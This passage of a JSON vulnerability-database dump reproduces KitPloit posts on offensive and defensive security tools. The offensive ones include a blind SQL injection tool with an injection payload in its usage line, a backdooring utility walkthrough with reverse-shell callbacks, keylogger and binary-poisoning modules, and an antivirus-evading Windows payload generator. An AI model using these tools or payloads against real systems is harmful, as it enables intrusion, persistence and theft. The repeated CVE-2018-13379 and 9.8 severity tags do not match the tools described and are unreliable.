in second order exploitation. (--2ndfile=/tmp/2ndreq.txt) \n\n \n\n\n\\--mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l) \n \n\\--hex Use hex to compare instead of characters. \n \n\\--case Case sensitivity. \n\n \n\n\n\\--ssl Use SSL. \n \n\\--proxy Proxy to use. (--proxy=127.0.0.1:8080) \n\n \n\n\n\\--test Enable test mode. Do not send request, just show full payload. \n \n\\--comma Encode comma. \n\n \n\n\n\\--bracket Add brackets to the end of substring function. --bracket=\"))\" \n\n \n\n\n\\--schar Character placed around chars. This character is not used while in hex mode. (--schar=\"'\") \n\n \n\n\n\\--special Include all special characters in enumeration. \n \n\\--start Start enumeration from specified character. (--start=10) \n \n\\--max Maximum characters to enumerate. (--max=10) \n\n \n\\--timeout Timeout in waiting for responses. (--timeout=20) \n\n \n\\--verbose Show verbose messages. \n\n \n\n\n** Example usage: **\n \n \n ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --prepend=\"abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,\" --append=\"'#\" --ssl\n\n \n \n\n\n** [ Download Bsqlinjector ](<https://github.com/enjoiz/BSQLinjector>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-12T22:02:07", "type": "kitploit", "title": "BSQLinjector - Blind SQL Injection Exploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-12T22:02:07", "id": "KITPLOIT:1244156083583318186", "href": "http://www.kitploit.com/2016/01/bsqlinjector-blind-sql-injection.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-03T15:22:37", "description": "[  ](<https://2.bp.blogspot.com/-c7WH2YDlZ_U/Vo_Y4Y_pvyI/AAAAAAAAFCE/knveejJV_cY/s1600/root.jpg>)\n\n \n\n\n** RootHelper **\n\nRoothelper will aid in the process of privilege escalation on a Linux system that has been compromised, by fetching a number of enumeration and exploit suggestion scripts. The latest version downloads four scripts. Two enumeration shellscripts and two exploit suggesters, one written in perl and the other one in python. \n\nThe credits for the scripts it fetches go to the original authors. \n\n \n \n** Priv-Esc scripts ** \n\n \n \n LinEnum \n\nShellscript that enumerates the system configuration. \n\n \n \n unix-privesc-check \n\nShellscript that enumerates the system configuration and runs some privilege escalation checks as well. \n\n \n \n linuxprivchecker \n\nA python implementation to suggest exploits particular to the system that's been compromised. \n\n \n \n Linux_Exploit_Suggester \n\nA perl script that that does the same as the one mentioned above. \n \n** Usage ** \nTo use the script you will need to get it on the system you've compromised, from there you can simply run it and it will show you the options available and an informational message regarding the options. For clarity i will post it below as well. \n\n \n \n The 'Help' option displays this informational message. The 'Download' option fetches the relevant files and places them in the /tmp/ directory. The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper. \n\nCredits for the other scripts go to their original authors. \n[ https://github.com/rebootuser/LinEnum ](<https://github.com/rebootuser/LinEnum>) \n[ https://github.com/PenturaLabs/Linux_Exploit_Suggester ](<https://github.com/PenturaLabs/Linux_Exploit_Suggester>) \n[ http://www.securitysift.com/download/linuxprivchecker.py ](<http://www.securitysift.com/download/linuxprivchecker.py>) \n[ https://github.com/pentestmonkey/unix-privesc-check ](<https://github.com/pentestmonkey/unix-privesc-check>) \n \n \n\n\n** [ Download Roothelper ](<https://github.com/NullArray/RootHelper>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-14T22:30:14", "type": "kitploit", "title": "RootHelper - A Bash Script That Downloads And Unzips Scripts That Will Aid With Privilege Escalation On A Linux System", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-14T22:30:14", "id": "KITPLOIT:119877528847056004", "href": "http://www.kitploit.com/2016/01/roothelper-bash-script-that-downloads.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:48", "description": "[  ](<https://2.bp.blogspot.com/-fkodyOyo17I/Vo9JJ0rPbKI/AAAAAAAAFBc/CtjklEnDKKM/s1600/backdoorme.png>)\n\n \n\n\nBackdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar metasploit interface with tremendous extensibility. \n\n \n\n\nBackdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded. To set up SSH, please see here: [ https://help.ubuntu.com/community/SSH/OpenSSH/Configuring ](<https://help.ubuntu.com/community/SSH/OpenSSH/Configuring>)\n\n \n\n\nPlease only use Backdoorme with explicit permission - please don't hack without asking. \n\n \n \n\n\n** Usage **\n\n \n\n\nBackdoorme comes with a number of built-in backdoors, modules, and auxiliary modules. Backdoors are specific components to create and deploy a specific backdoor, such as a netcat backdoor or msfvenom backdoor. Modules can be applied to any backdoor, and are used to make backdoors more potent, stealthy, or more readily tripped. Auxiliaries are useful operations that could be performed to help persistence. \n\n \n\n\nTo start backdoorme, first ensure that you have the required dependencies. \n \n \n $ python dependencies.py\n\nLaunching backdoorme: \n \n \n $ python master.py ___ __ __ __ ___ / _ )___ _____/ /_____/ /__ ___ ____/ |/ /__ / _ / _ `/ __/ '_/ _ / _ \\/ _ \\/ __/ /|_/ / -_) /____/\\_,_/\\__/_/\\_\\\\_,_/\\___/\\___/_/ /_/ /_/\\__/ Welcome to BackdoorMe, a powerful backdooring utility. Type \"help\" to see the list of available commands. Type \"addtarget\" to set a target, and \"open\" to open an SSH connection to that target. Using local IP of 10.1.0.1. >> \n\nTo add a target: \n\n \n \n >> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >> \n\n \n** Backdoors ** \nTo use a backdoor, simply run the \"use\" keyword. \n\n \n \n >> use metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >> \n\nFrom there, you can set options pertinent to the backdoor. Run either \"show options\" or \"help\" to see a list of parameters that can be configured. To set an option, simply use the \"set\" keyword. \n\n \n \n (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False format elf format to write the backdoor to True lhost 10.1.0.1 local IP to connect back to True encoder none encoder to use for the backdoor False lport 4444 local port to connect back on True payload linux/x86/meterpreter/reverse_tcp payload to deploy in backdoor True (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ... \n\nCurrently enabled backdoors include: \n\n\n * Bash \n * Bash2 (more reliable) \n * Metasploit \n * Netcat \n * Netcat-traditional \n * Perl \n * Php (does not automatically install a web server, but use the web module!) \n * Pupy \n * Python \n * Web (php - not the same backdoor as the above php backdoor) \n \n** Modules ** \nEvery backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the \"add\" keyword. \n\n \n \n (msf) >> add poison + Poison module added \n\nEach module has additional parameters that can be customized, and if \"help\" is rerun, you can see or set any additional options. \n\n \n \n (msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False \n\nCurrently enabled modules include: \n\n\n * Poison \n * Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. \n * For example, if the bin poisoning module is triggered with \"ls\", it would would compile and move a binary called \"ls\" that would run both an existing backdoor and the original \"ls\", thereby tripping a user to run an existing backdoor more frequently. \n * Cron \n * Adds an existing backdoor to the root user's crontab to run with a given frequency. \n\n * Web \n * Sets up a web server and places a web page which triggers the backdoor. \n * Simply visit the site with your listener open and the backdoor will begin. \n * Keylogger \n * Ships a keylogger to the target and starts it. \n * Given the option to email the results to you every hour. \n * User \n * Adds a new user to the target. \n * Startup \n * Allows for backdoors to be spawned with the bashrc and init files. \n \n** Auxiliaries ** \nIn order to have persistence be more potent, some users may wish to install certain services on a target. To apply an auxiliary module, use the \"apply\" keyword. \n\n \n \n >> apply user + User Auxiliary Module added. \n\nAuxiliaries also support the use of modules, so they can be triggered more steathily or more often. \n\n \n \n >> (user) add startup + Startup Module added. \n\nCurrently enabled auxiliaries include: \n\n\n * User \n * Adds a new user to the target. \n \n** Targets ** \nBackdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one \"current\" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: \"use metasploit 2\" will prepare the metasploit backdoor against the second target. \n \n \n\n\n** [ Download BackdoorMe ](<https://github.com/Kkevsterrr/backdoorme>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-11T22:33:00", "type": "kitploit", "title": "BackdoorMe - Powerful Auto-Backdooring Utility", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-11T22:33:00", "id": "KITPLOIT:7070039119688478663", "href": "http://www.kitploit.com/2016/01/backdoorme-powerful-auto-backdooring.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T15:26:46", "description": "[  ](<https://3.bp.blogspot.com/-0ykNvRCsIbA/Vo9M4RZq4lI/AAAAAAAAFB0/0ABRvwPqasU/s1600/killchain2.png>)\n\n \n \n** \u201cKill Chain\u201d is a unified console with an anonymizer that will perform these stages of attacks: ** \n\n\n * Reconnaissance \n\n * Weaponization \n\n * Delivery \n\n * Exploit \n\n * Installation \n\n * Command & Control \n\n * And Actions \n \n** Dependant tool sets are: ** \n1) Tor -- For the console build in anonymizer. \n2) Set -- Social-Engineer Toolkit (SET), attacks against humans. \n3) OpenVas -- Vulnerability scanning and vulnerability management. \n4) Veil-Evasion -- Generate metasploit payloads bypass anti-virus. \n5) Websploit -- WebSploit Advanced MITM Framework. \n6) Metasploit -- Executing exploit code against target. \n7) WiFite -- Automated wireless auditor, designed for Linux. \n \n \n\n\n** [ Download Killchain ](<https://github.com/ruped24/killchain>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-13T22:21:08", "type": "kitploit", "title": "Killchain - A Unified Console To Perform The \"Kill Chain\" Stages Of Attacks", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-13T22:21:08", "id": "KITPLOIT:2722328714476257207", "href": "http://www.kitploit.com/2016/01/killchain-unified-console-to-perform.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-07T12:02:25", "description": "[](<https://1.bp.blogspot.com/-UHVncGEoQzM/X8RrroEBUbI/AAAAAAAAUgA/CpnEhlniG8cL71wLnLCRySri89V-CtwMACNcBGAsYHQ/s1183/fortiscan_1_1.jpeg>)\n\n \n\n\n(CVE-2018-13379) [Exploitation](<https://www.kitploit.com/search/label/Exploitation> \"Exploitation\" ) Tool, You can use this tool to check the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) in your FortiGate SSL-VPN. <https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability>\n\n \n\n\n[](<https://1.bp.blogspot.com/-vzR4Utm2ico/X8RrxdcqeoI/AAAAAAAAUgE/M7-FDmcmTeomtSnlCWGG2mUfC6enbT5RgCNcBGAsYHQ/s1183/fortiscan_2_2.jpeg>)\n\n \n\n\n**Usage v 0.6 File List** \n\n\n`./fortiscan ip.txt `\n\n \n**Usage v 0.5 (One Liner to Initiate the [Scan](<https://www.kitploit.com/search/label/Scan> \"Scan\" ) : Host|IP:Port(443 or 10443 or 8443)** \n\n\n`./fortiscan 192.168.1.1:10443 `\n\n \n**Requirements** \n\n\nTested with Parrot & [Debian](<https://www.kitploit.com/search/label/Debian> \"Debian\" ) Operating Systems and [Windows](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) 10\n\n \n \n\n\n**[Download Fortiscan](<https://github.com/anasbousselham/fortiscan> \"Download Fortiscan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-30T11:30:00", "type": "kitploit", "title": "Fortiscan - A High Performance FortiGate SSL-VPN Vulnerability Scanning And Exploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2020-11-30T11:30:09", "id": "KITPLOIT:965198862441671998", "href": "http://www.kitploit.com/2020/11/fortiscan-high-performance-fortigate.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T21:29:17", "description": "[  ](<https://3.bp.blogspot.com/-Nwco4gG9BGQ/Vo8z8IY2dKI/AAAAAAAAFA0/V49lKsfoWuQ/s1600/mailtrail_main.png>)\n\n \n\n\n** Maltrail ** is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. ` zvpprsensinaix.com ` for [ Banjori ](<http://www.johannesbader.ch/2015/02/the-dga-of-banjori/>) malware), URL (e.g. ` http://109.162.38.120/harsh02.exe ` for known malicious [ executable ](<https://www.virustotal.com/en/file/61f56f71b0b04b36d3ef0c14bbbc0df431290d93592d5dd6e3fffcc583ec1e12/analysis/>) ) or IP address (e.g. ` 103.224.167.117 ` for known attacker). Also, it has (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware). \n\n \nThe following (black)lists (i.e. feeds) are being utilized: \n\n \n \n alienvault, autoshun, badips, bambenekconsultingc2, bambenekconsultingdga, binarydefense, bitcoinnodes, blocklist, botscout, bruteforceblocker, ciarmy, cruzit, cybercrimetracker, dshielddns, dshieldip, emergingthreatsbot, emergingthreatscip, emergingthreatsdns, feodotrackerdns, feodotrackerip, greensnow, malwarepatrol, malwareurlsnormal, maxmind, myip, nothink, openbl, openphish, palevotracker, proxylists, proxyrss, proxy, riproxies, rutgers, sblam, snort, socksproxy, sslipbl, sslproxies, torproject, torstatus, voipbl, vxvault, zeustrackerdns, zeustrackerip, zeustrackermonitor, zeustrackerurl, etc. \n\nAs of static entries, the trails for the following malicious entities (e.g. malware C&Cs) have been manually included (from various AV reports): \n\n \n \n alureon, android_stealer, angler, aridviper, axpergle, babar, balamid, bamital, bankpatch, bedep, black_vine, bubnix, carbanak, careto, casper, chewbacca, cleaver, conficker, cosmicduke, couponarific, crilock, cryptolocker, cryptowall, ctblocker, darkhotel, defru, desertfalcon, destory, dorifel, dorkbot, dridex, dukes, dursg, dyreza, emotet, equation, evilbunny, expiro, fakeran, fareit, fbi_ransomware, fiexp, fignotok, fin4, finfisher, gamarue, gauss, htran, jenxcus, kegotip, kovter, lollipop, lotus_blossom, luckycat, mariposa, miniduke, modpos, nbot, nettraveler, neurevt, nitol, nonbolqu, nuqel, nwt, nymaim, palevo, pdfjsc, pift, plugx, ponmocup, powelike, proslikefan, pushdo, ransirac, redoctober, reveton, russian_doll, sality, sathurbot, scieron, sefnit, shylock, siesta, simda, sinkhole_1and1, sinkhole_abuse, sinkhole_blacklistthisdomain, sinkhole_certpl, sinkhole_drweb, sinkhole_fbizeus, sinkhole_fitsec, sinkhole_georgiatech, sinkhole_kaspersky, sinkhole_microsoft, sinkhole_shadowserver, sinkhole_sinkdns, sinkhole_zinkhole, skyper, smsfakesky, snake, snifula, sofacy, stuxnet, teerac, teslacrypt, torpig, torrentlocker, unruy, upatre, vawtrak, virut, vobfus, volatile_cedar, vundo, waterbug, zeroaccess, zlob, etc. \n\n \n** Architecture ** \nMaltrail is based on the ** Sensor ** <-> ** Server ** <-> ** Client ** architecture. ** Sensor ** (s) is a standalone component running on the monitoring node (e.g. Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine (e.g. Honeypot) where it \"sniffs\" the passing traffic for blacklisted items/trails (i.e. domain names, URLs and/or IPs). In case of a positive match, it sends the event details to the (central) ** Server ** where they are being stored inside the appropriate logging directory (i.e. ` LOG_DIR ` described in the _ Configuration _ section). If ** Sensor ** is being run on the same machine as ** Server ** (default configuration), logs are stored directly into the local logging directory. Otherwise, they are being sent via UDP messages to the remote server (i.e. ` LOG_SERVER ` described in the _ Configuration _ section). \n \n\n\n[  ](<https://2.bp.blogspot.com/-w31xkGAuj0s/Vo8ztFwxqeI/AAAAAAAAFAs/TsC7v-yZZAs/s1600/mailtrail.png>)\n\n \n** Server ** 's primary role is to store the event details and provide back-end support for the reporting web application. In default configuration, server and sensor will run on the same machine. So, to prevent potential disruptions in sensor activities, the front-end reporting part is based on the [ \"Fat client\" ](<https://en.wikipedia.org/wiki/Fat_client>) architecture (i.e. all data post-processing is being done inside the client's web browser instance). Events (i.e. log entries) for the chosen (24h) period are transferred to the ** Client ** , where the reporting web application is solely responsible for the presentation part. Data is sent toward the client in compressed chunks, where they are processed sequentially. The final report is created in a highly condensed form, practically allowing presentation of virtually unlimited number of events. \nNote: ** Server ** component can be skipped altogether, and just use the standalone ** Sensor ** . In such case, all events would be stored in the local logging directory, while the log entries could be examined either manually or by some CSV reading application. \n \n** Quick start ** \nThe following set of commands should get your Maltrail ** Sensor ** up and running (out of the box with default settings and monitoring interface \"any\"): \n\n \n \n sudo apt-get install python-pcapy \u00a0\n \n \n git clone https://github.com/stamparm/maltrail.git \u00a0\n \n \n cd maltrail \u00a0\n \n \n sudo python sensor.py \n\n \n \n\n\n** [ Download Maltrail ](<https://github.com/stamparm/maltrail>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-10T05:20:46", "type": "kitploit", "title": "Maltrail - Malicious Traffic Detection System", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-10T05:20:46", "id": "KITPLOIT:5563730483162396602", "href": "http://www.kitploit.com/2016/01/maltrail-malicious-traffic-detection.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:03", "description": "[  ](<https://4.bp.blogspot.com/-qU0TZ7y-LRM/VoxK_5jzgvI/AAAAAAAAE_8/6ozD2SP7VXA/s1600/ParanoicScan.jpeg>)\n\n \n** Old Options ** \n \nGoogle & Bing Scanner that also scan : \n \n\n\n * XSS \n\n * SQL GET / POST \n\n * SQL GET \n\n * SQL GET + Admin \n\n * Directory listing \n\n * MSSQL \n\n * Jet Database \n\n * Oracle \n\n * LFI \n\n * RFI \n\n * Full Source Discloure \n\n * HTTP Information \n\n * SQLi Scanner \n\n * Bypass Admin \n\n * Exploit FSD Manager \n\n * Paths Finder \n\n * IP Locate \n\n * Crack MD5 \n\n * Panel Finder \n\n * Console \n\n\n \n\n\n** Fixes ** \n \n[+] Refresh of existing pages to crack md5 \n[+] Error scanner fsd \n[+] Http error scanner scan \n[+] Spaces between text too annoying \n[+] Added array to bypass \n[+] Failed to read from file \n \n** New options ** \n \n[+] Generate all logs in a html file \n[+] Incorporates random and new useragent \n[+] Multi encoder / decoder : \n \n\n\n * Ascii \n\n * Hex \n\n * Url \n\n * Bin To Text & Text To Bin \n\n[+] PortScanner \n[+] HTTP FingerPrinting \n[+] CSRF Tool \n[+] Scan XSS \n[+] Generator for XSS Bypass \n[+] Generator links to tiny url \n[+] Finder and downloader exploits on Exploit-DB \n[+] Mysql Manager \n[+] Tools LFI \n** \n** ** An video ** \n \n \n\n\n** [ Download Paranoicscan ](<https://github.com/DoddyHackman/ParanoicScan>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-06T21:59:10", "type": "kitploit", "title": "ParanoicScan - Vulnerability Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-06T21:59:10", "id": "KITPLOIT:5829195600312197311", "href": "http://www.kitploit.com/2016/01/paranoicscan-vulnerability-scanner.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:27:51", "description": "[  ](<https://3.bp.blogspot.com/-k9Vmaf5cAn8/Vo_oT-iqyGI/AAAAAAAAFCw/5sZ7TlaL5LM/s1600/Project%2BArsenal%2BX.jpeg>)\n\n \n** Project Arsenal X ** \nNew version of my Arsenal X written in Delphi with the following options: \n \n[+] Gmail Inbox \n[+] Whois Client \n[+] Table \n[+] Downloader \n[+] Get IP \n[+] Locate IP \n[+] K0bra SQLI Scanner \n[+] Crack multiple hashes \n[+] Search admin panel \n[+] Port Scanner \n[+] Multi Cracker with support for FTP, TELNET, POP3 \n[+] Execution of commands in the console \n \n** An video : ** \n \n \n\n\n** [ Download Project Arsenal X ](<https://github.com/DoddyHackman/Arsenal_X>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-18T00:48:17", "type": "kitploit", "title": "Project Arsenal X - As HackTheGame But Real", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-18T00:48:17", "id": "KITPLOIT:816704453339226193", "href": "http://www.kitploit.com/2016/01/project-arsenal-x-as-hackthegame-but.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T23:29:09", "description": "[  ](<https://3.bp.blogspot.com/-6SwNRV-BvEg/Vo7yQzPl24I/AAAAAAAAFAc/82tyYySqf7M/s1600/Winpayloads.png>)\n\n \nUndetectable Windows Payload Generation with extras Running on Python2.7 \n \n\n\n## Getting Started \n \n \n git clone https://github.com/Charliedean/Winpayloads\n cd WinPayloads\n sudo ./setup.sh\n python WinPayloads.py\n\n## Menu \n \n \n [1] Windows Reverse Shell(Stageless) [Shellter]\n [2] Windows Reverse Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]\n [3] Windows Bind Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]\n [4] Windows Reverse Meterpreter(Raw Shellcode) [Base64 Encode]\n\n \n\n\n** [ \n](<https://github.com/Charliedean/Winpayloads>) **\n\n** [ Download Winpayloads ](<https://github.com/Charliedean/Winpayloads>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 